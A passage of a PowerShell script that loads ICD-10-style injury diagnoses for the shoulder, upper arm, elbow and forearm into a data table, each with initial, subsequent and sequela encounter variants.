end of humerus, unspecified arm","Other physeal fracture of lower end of humerus, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of shoulder and upper arm, unspecified arm","Other specified injuries of shoulder and upper arm, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of shoulder and upper arm, unspecified arm","Other specified injuries of shoulder and upper arm, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of shoulder and upper arm, unspecified arm","Other specified injuries of shoulder and upper arm, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right shoulder and upper arm","Other specified injuries of right shoulder and upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right shoulder and upper arm","Other specified injuries of right shoulder and upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of right shoulder and upper arm","Other specified injuries of right shoulder and upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left shoulder and upper arm","Other specified injuries of left shoulder and upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left shoulder and upper arm","Other specified injuries of left shoulder and upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other specified injuries of left shoulder and upper arm","Other specified injuries of left shoulder and upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of shoulder and upper arm, unspecified arm","Unspecified injury of shoulder and upper arm, unspecified arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of shoulder and upper arm, unspecified arm","Unspecified injury of shoulder and upper arm, unspecified arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of shoulder and upper arm, unspecified arm","Unspecified injury of shoulder and upper arm, unspecified arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right shoulder and upper arm","Unspecified injury of right shoulder and upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right shoulder and upper arm","Unspecified injury of right shoulder and upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of right shoulder and upper arm","Unspecified injury of right shoulder and upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left shoulder and upper arm","Unspecified injury of left shoulder and upper arm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left shoulder and upper arm","Unspecified injury of left shoulder and upper arm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified injury of left shoulder and upper arm","Unspecified injury of left shoulder and upper arm, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified elbow","Contusion of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified elbow","Contusion of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified elbow","Contusion of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right elbow","Contusion of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right elbow","Contusion of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right elbow","Contusion of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left elbow","Contusion of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left elbow","Contusion of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left elbow","Contusion of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified forearm","Contusion of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified forearm","Contusion of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of unspecified forearm","Contusion of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of right forearm","Contusion of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right forearm","Contusion of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of right forearm","Contusion of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Contusion of left forearm","Contusion of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left forearm","Contusion of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Contusion of left forearm","Contusion of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right elbow","Abrasion of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right elbow","Abrasion of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right elbow","Abrasion of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left elbow","Abrasion of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left elbow","Abrasion of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left elbow","Abrasion of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified elbow","Abrasion of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified elbow","Abrasion of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified elbow","Abrasion of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right elbow","Blister (nonthermal) of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right elbow","Blister (nonthermal) of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right elbow","Blister (nonthermal) of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left elbow","Blister (nonthermal) of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left elbow","Blister (nonthermal) of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left elbow","Blister (nonthermal) of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified elbow","Blister (nonthermal) of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified elbow","Blister (nonthermal) of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified elbow","Blister (nonthermal) of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right elbow","External constriction of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right elbow","External constriction of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right elbow","External constriction of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left elbow","External constriction of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left elbow","External constriction of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left elbow","External constriction of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified elbow","External constriction of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified elbow","External constriction of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified elbow","External constriction of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right elbow","Superficial foreign body of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right elbow","Superficial foreign body of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right elbow","Superficial foreign body of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left elbow","Superficial foreign body of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left elbow","Superficial foreign body of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left elbow","Superficial foreign body of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified elbow","Superficial foreign body of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified elbow","Superficial foreign body of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified elbow","Superficial foreign body of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right elbow","Insect bite (nonvenomous) of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right elbow","Insect bite (nonvenomous) of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right elbow","Insect bite (nonvenomous) of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left elbow","Insect bite (nonvenomous) of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left elbow","Insect bite (nonvenomous) of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left elbow","Insect bite (nonvenomous) of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified elbow","Insect bite (nonvenomous) of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified elbow","Insect bite (nonvenomous) of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified elbow","Insect bite (nonvenomous) of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right elbow","Other superficial bite of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right elbow","Other superficial bite of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right elbow","Other superficial bite of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left elbow","Other superficial bite of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left elbow","Other superficial bite of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left elbow","Other superficial bite of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified elbow","Other superficial bite of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified elbow","Other superficial bite of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified elbow","Other superficial bite of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of right forearm","Abrasion of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right forearm","Abrasion of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of right forearm","Abrasion of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of left forearm","Abrasion of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left forearm","Abrasion of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of left forearm","Abrasion of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified forearm","Abrasion of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified forearm","Abrasion of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Abrasion of unspecified forearm","Abrasion of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right forearm","Blister (nonthermal) of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right forearm","Blister (nonthermal) of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of right forearm","Blister (nonthermal) of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left forearm","Blister (nonthermal) of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left forearm","Blister (nonthermal) of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of left forearm","Blister (nonthermal) of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified forearm","Blister (nonthermal) of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified forearm","Blister (nonthermal) of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Blister (nonthermal) of unspecified forearm","Blister (nonthermal) of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of right forearm","External constriction of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right forearm","External constriction of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of right forearm","External constriction of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of left forearm","External constriction of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left forearm","External constriction of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of left forearm","External constriction of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified forearm","External constriction of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified forearm","External constriction of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("External constriction of unspecified forearm","External constriction of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right forearm","Superficial foreign body of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right forearm","Superficial foreign body of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of right forearm","Superficial foreign body of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left forearm","Superficial foreign body of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left forearm","Superficial foreign body of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of left forearm","Superficial foreign body of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified forearm","Superficial foreign body of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified forearm","Superficial foreign body of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Superficial foreign body of unspecified forearm","Superficial foreign body of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right forearm","Insect bite (nonvenomous) of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right forearm","Insect bite (nonvenomous) of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of right forearm","Insect bite (nonvenomous) of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left forearm","Insect bite (nonvenomous) of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left forearm","Insect bite (nonvenomous) of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of left forearm","Insect bite (nonvenomous) of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified forearm","Insect bite (nonvenomous) of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified forearm","Insect bite (nonvenomous) of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Insect bite (nonvenomous) of unspecified forearm","Insect bite (nonvenomous) of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right forearm","Other superficial bite of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right forearm","Other superficial bite of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of right forearm","Other superficial bite of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left forearm","Other superficial bite of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left forearm","Other superficial bite of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of left forearm","Other superficial bite of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified forearm","Other superficial bite of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified forearm","Other superficial bite of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other superficial bite of unspecified forearm","Other superficial bite of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right elbow","Unspecified superficial injury of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right elbow","Unspecified superficial injury of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right elbow","Unspecified superficial injury of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left elbow","Unspecified superficial injury of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left elbow","Unspecified superficial injury of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left elbow","Unspecified superficial injury of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified elbow","Unspecified superficial injury of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified elbow","Unspecified superficial injury of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified elbow","Unspecified superficial injury of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right forearm","Unspecified superficial injury of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right forearm","Unspecified superficial injury of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of right forearm","Unspecified superficial injury of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left forearm","Unspecified superficial injury of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left forearm","Unspecified superficial injury of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of left forearm","Unspecified superficial injury of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified forearm","Unspecified superficial injury of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified forearm","Unspecified superficial injury of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified superficial injury of unspecified forearm","Unspecified superficial injury of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right elbow","Unspecified open wound of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right elbow","Unspecified open wound of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right elbow","Unspecified open wound of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left elbow","Unspecified open wound of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left elbow","Unspecified open wound of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left elbow","Unspecified open wound of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified elbow","Unspecified open wound of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified elbow","Unspecified open wound of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified elbow","Unspecified open wound of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right elbow","Laceration without foreign body of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right elbow","Laceration without foreign body of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right elbow","Laceration without foreign body of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left elbow","Laceration without foreign body of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left elbow","Laceration without foreign body of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left elbow","Laceration without foreign body of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified elbow","Laceration without foreign body of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified elbow","Laceration without foreign body of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified elbow","Laceration without foreign body of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right elbow","Laceration with foreign body of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right elbow","Laceration with foreign body of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right elbow","Laceration with foreign body of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left elbow","Laceration with foreign body of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left elbow","Laceration with foreign body of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left elbow","Laceration with foreign body of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified elbow","Laceration with foreign body of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified elbow","Laceration with foreign body of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified elbow","Laceration with foreign body of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right elbow","Puncture wound without foreign body of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right elbow","Puncture wound without foreign body of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right elbow","Puncture wound without foreign body of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left elbow","Puncture wound without foreign body of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left elbow","Puncture wound without foreign body of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left elbow","Puncture wound without foreign body of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified elbow","Puncture wound without foreign body of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified elbow","Puncture wound without foreign body of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified elbow","Puncture wound without foreign body of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right elbow","Puncture wound with foreign body of right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right elbow","Puncture wound with foreign body of right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right elbow","Puncture wound with foreign body of right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left elbow","Puncture wound with foreign body of left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left elbow","Puncture wound with foreign body of left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left elbow","Puncture wound with foreign body of left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified elbow","Puncture wound with foreign body of unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified elbow","Puncture wound with foreign body of unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified elbow","Puncture wound with foreign body of unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, right elbow","Open bite, right elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right elbow","Open bite, right elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, right elbow","Open bite, right elbow, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, left elbow","Open bite, left elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left elbow","Open bite, left elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, left elbow","Open bite, left elbow, sequela") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified elbow","Open bite, unspecified elbow, initial encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified elbow","Open bite, unspecified elbow, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Open bite, unspecified elbow","Open bite, unspecified elbow, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right forearm","Unspecified open wound of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right forearm","Unspecified open wound of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of right forearm","Unspecified open wound of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left forearm","Unspecified open wound of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left forearm","Unspecified open wound of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of left forearm","Unspecified open wound of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified forearm","Unspecified open wound of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified forearm","Unspecified open wound of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified open wound of unspecified forearm","Unspecified open wound of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right forearm","Laceration without foreign body of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right forearm","Laceration without foreign body of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of right forearm","Laceration without foreign body of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left forearm","Laceration without foreign body of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left forearm","Laceration without foreign body of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of left forearm","Laceration without foreign body of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified forearm","Laceration without foreign body of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified forearm","Laceration without foreign body of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration without foreign body of unspecified forearm","Laceration without foreign body of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right forearm","Laceration with foreign body of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right forearm","Laceration with foreign body of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of right forearm","Laceration with foreign body of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left forearm","Laceration with foreign body of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left forearm","Laceration with foreign body of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of left forearm","Laceration with foreign body of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified forearm","Laceration with foreign body of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified forearm","Laceration with foreign body of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Laceration with foreign body of unspecified forearm","Laceration with foreign body of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right forearm","Puncture wound without foreign body of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right forearm","Puncture wound without foreign body of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of right forearm","Puncture wound without foreign body of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left forearm","Puncture wound without foreign body of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left forearm","Puncture wound without foreign body of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of left forearm","Puncture wound without foreign body of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified forearm","Puncture wound without foreign body of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified forearm","Puncture wound without foreign body of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound without foreign body of unspecified forearm","Puncture wound without foreign body of unspecified forearm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right forearm","Puncture wound with foreign body of right forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right forearm","Puncture wound with foreign body of right forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of right forearm","Puncture wound with foreign body of right forearm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left forearm","Puncture wound with foreign body of left forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left forearm","Puncture wound with foreign body of left forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of left forearm","Puncture wound with foreign body of left forearm, sequela") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified forearm","Puncture wound with foreign body of unspecified forearm, initial encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified forearm","Puncture wound with foreign body of unspecified forearm, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Puncture wound with foreign body of unspecified forearm","Puncture wound with foreign body of unspecified forearm, sequela") + $null = 